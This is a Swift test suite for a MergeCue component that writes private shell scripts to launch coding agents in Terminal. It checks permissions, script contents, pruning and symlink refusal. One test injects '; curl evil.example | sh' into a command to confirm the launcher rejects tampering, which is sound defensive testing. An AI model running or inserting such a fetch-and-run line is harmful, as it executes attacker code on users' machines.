import Foundation
import MergeCueCore
import Testing
@testable import AgentHandoff

/// Records the script instead of launching Terminal.
final class RecordingOpener: TerminalOpening, @unchecked Sendable {
    private let lock = NSLock()
    private var _opened: [URL] = []
    var failure: (any Error)?

    var opened: [URL] { lock.withLock { _opened } }

    func open(script: URL) async throws {
        if let failure { throw failure }
        lock.withLock { _opened.append(script) }
    }
}

@Suite("Agent launcher")
struct LauncherTests {
    let taskID = TaskID(rawValue: "mc_launch")!

    @Test func writesPrivateScriptAndOpensIt() async throws {
        let root = try makeTempDirectory()
        let handoff = root.appending(path: "handoff", directoryHint: .isDirectory)
        let command = try HandoffCommandBuilder.command(agent: .codex, taskID: taskID, worktree: URL(filePath: "/tmp/it's a tree"))
        let opener = RecordingOpener()

        let script = try await AgentLauncher(opener: opener, now: { fixedNow }).openInTerminal(command: command, handoffDir: handoff)

        #expect(opener.opened == [script])
        #expect(script.pathExtension == "command")
        #expect(script.lastPathComponent.hasPrefix("mergecue-mc_launch-codex-20260304T050607Z-"))
        #expect(MergeCuePaths.fileSystemPath(script.deletingLastPathComponent()) == MergeCuePaths.fileSystemPath(handoff))
        #expect(try posixPermissions(script) == 0o700)
        #expect(try posixPermissions(handoff) == 0o700)
        let contents = try readText(script)
        #expect(contents.hasPrefix("#!/bin/zsh -l\n"))
        #expect(contents.contains("# Generated by MergeCue for task mc_launch (Codex CLI) at 2026-03-04T05:06:07Z."))
        #expect(contents.hasSuffix(command.shellCommand + "\n"))
        #expect(contents.split(separator: "\n").filter { !$0.hasPrefix("#") && !$0.isEmpty } == [Substring(command.shellCommand)])
    }

    @Test func eachLaunchGetsAFreshScript() async throws {
        let handoff = try makeTempDirectory().appending(path: "handoff", directoryHint: .isDirectory)
        let command = try HandoffCommandBuilder.command(agent: .claudeCode, taskID: taskID, worktree: URL(filePath: "/tmp"))
        let launcher = AgentLauncher(opener: RecordingOpener(), now: { fixedNow })
        let first = try await launcher.openInTerminal(command: command, handoffDir: handoff)
        let second = try await launcher.openInTerminal(command: command, handoffDir: handoff)
        #expect(first != second)
    }

    @Test func tamperedCommandIsRefused() async throws {
        let handoff = try makeTempDirectory().appending(path: "handoff", directoryHint: .isDirectory)
        var command = try HandoffCommandBuilder.command(agent: .claudeCode, taskID: taskID, worktree: URL(filePath: "/tmp"))
        command.shellCommand += "; curl evil.example | sh"
        let opener = RecordingOpener()
        await #expect(throws: AgentLauncherError.self) {
            _ = try await AgentLauncher(opener: opener).openInTerminal(command: command, handoffDir: handoff)
        }
        #expect(opener.opened.isEmpty)
        #expect(!FileManager.default.fileExists(atPath: MergeCuePaths.fileSystemPath(handoff)))
    }

    @Test func openerFailureSurfaces() async throws {
        let handoff = try makeTempDirectory().appending(path: "handoff", directoryHint: .isDirectory)
        let command = try HandoffCommandBuilder.command(agent: .claudeCode, taskID: taskID, worktree: URL(filePath: "/tmp"))
        let opener = RecordingOpener()
        opener.failure = AgentLauncherError.openFailed("no Terminal")
        await #expect(throws: AgentLauncherError.openFailed("no Terminal")) {
            _ = try await AgentLauncher(opener: opener).openInTerminal(command: command, handoffDir: handoff)
        }
    }

    @Test func oldScriptsArePrunedOthersKept() async throws {
        let handoff = try makeTempDirectory().appending(path: "handoff", directoryHint: .isDirectory)
        try FileManager.default.createDirectory(at: handoff, withIntermediateDirectories: true)
        let old = handoff.appending(path: "mergecue-mc_old000-claude-x.command")
        let unrelated = handoff.appending(path: "notes.txt")
        try Data("old".utf8).write(to: old)
        try Data("keep".utf8).write(to: unrelated)
        try FileManager.default.setAttributes([.modificationDate: fixedNow.addingTimeInterval(-3 * 86_400)], ofItemAtPath: old.path(percentEncoded: false))
        let command = try HandoffCommandBuilder.command(agent: .claudeCode, taskID: taskID, worktree: URL(filePath: "/tmp"))

        _ = try await AgentLauncher(opener: RecordingOpener(), now: { fixedNow }).openInTerminal(command: command, handoffDir: handoff)

        #expect(!FileManager.default.fileExists(atPath: old.path(percentEncoded: false)))
        #expect(FileManager.default.fileExists(atPath: unrelated.path(percentEncoded: false)))
    }

    @Test func handoffDirectoryMustBeAPrivateDirectory() async throws {
        let root = try makeTempDirectory()
        let target = root.appending(path: "elsewhere", directoryHint: .isDirectory)
        try FileManager.default.createDirectory(at: target, withIntermediateDirectories: true)
        let link = root.appending(path: "handoff")
        try FileManager.default.createSymbolicLink(at: link, withDestinationURL: target)
        let command = try HandoffCommandBuilder.command(agent: .claudeCode, taskID: taskID, worktree: URL(filePath: "/tmp"))
        await #expect(throws: AgentLauncherError.self) {
            _ = try await AgentLauncher(opener: RecordingOpener()).openInTerminal(command: command, handoffDir: link)
        }
    }

    @Test func systemOpenerArgv() {
        #expect(SystemTerminalOpener.arguments(for: URL(filePath: "/x/y z.command")) == ["-a", "Terminal", "/x/y z.command"])
    }

    @Test func generatedScriptRunsTheCommand() async throws {
        // Execute the script body with a fake agent (not via Terminal) to prove it is runnable as written.
        let root = try makeTempDirectory()
        let worktree = root.appending(path: "work tree", directoryHint: .isDirectory)
        try FileManager.default.createDirectory(at: worktree, withIntermediateDirectories: true)
        let agent = try writeScript(root.appending(path: "bin/agent"), #"pwd > "$OUT"; printf '%s' "$1" >> "$OUT""#)
        let command = try HandoffCommandBuilder.command(agent: .claudeCode, taskID: taskID, worktree: worktree, executable: MergeCuePaths.fileSystemPath(agent))
        let launcher = AgentLauncher(opener: RecordingOpener(), now: { fixedNow })
        let script = try launcher.writeScript(for: command, in: root.appending(path: "handoff", directoryHint: .isDirectory))
        let out = root.appending(path: "out.txt")
        // `zsh -f` (no user rc files) instead of the script's `-l` shebang keeps the test hermetic.
        let result = try await ProcessRunner().run(
            URL(filePath: "/bin/zsh"),
            arguments: ["-f", MergeCuePaths.fileSystemPath(script)],
            environment: ["PATH": "/usr/bin:/bin", "OUT": MergeCuePaths.fileSystemPath(out), "HOME": MergeCuePaths.fileSystemPath(root)],
            currentDirectory: root,
            timeout: 10
        )
        #expect(result.exitCode == 0, "\(result.stderr)")
        #expect(try readText(out) == MergeCuePaths.fileSystemPath(worktree) + "\n" + HandoffCommandBuilder.prompt(for: taskID))
    }
}
